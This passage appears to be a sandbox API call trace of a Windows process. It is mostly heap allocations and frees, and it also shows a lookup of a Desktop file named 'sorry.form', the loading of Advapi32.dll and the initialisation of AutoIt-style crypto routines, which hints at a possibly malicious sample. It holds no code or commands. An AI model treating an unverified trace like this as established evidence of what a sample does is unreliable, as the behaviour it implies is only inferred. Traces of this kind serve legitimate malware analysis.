HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0206.338] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0206.338] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0206.338] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0206.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0206.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0206.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0206.339] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0206.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0206.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.339] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0206.339] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0206.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0206.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0206.340] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/sorry.form", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd491219f, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd491219f, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd4ab5b65, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0x113f94, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="sorry.form", cAlternateFileName="SORRY~1.FOR")) returned 0xa87250 [0206.340] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0206.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0206.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0206.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0206.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0206.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0206.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0206.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0206.340] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.340] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0206.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0206.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0206.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0206.340] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.341] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0206.341] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0206.341] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0206.341] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0206.341] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0206.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0206.341] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0206.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0206.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0206.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0206.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0206.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0206.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0206.342] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0206.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0206.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0206.342] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0206.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0206.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0206.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0206.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.343] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0206.343] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0206.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0206.343] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0206.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0206.344] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0206.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0206.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0206.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0206.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0206.344] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0206.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0206.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.344] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0206.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0206.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0206.344] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0206.345] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0206.345] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0206.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0206.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0206.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0206.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0206.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0206.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0206.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0206.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0206.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0206.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0206.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0206.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0206.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0206.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0206.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0206.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0206.346] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.369] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0206.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0206.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0206.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0206.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0206.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0206.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0206.369] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0206.369] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0206.370] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0206.370] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: 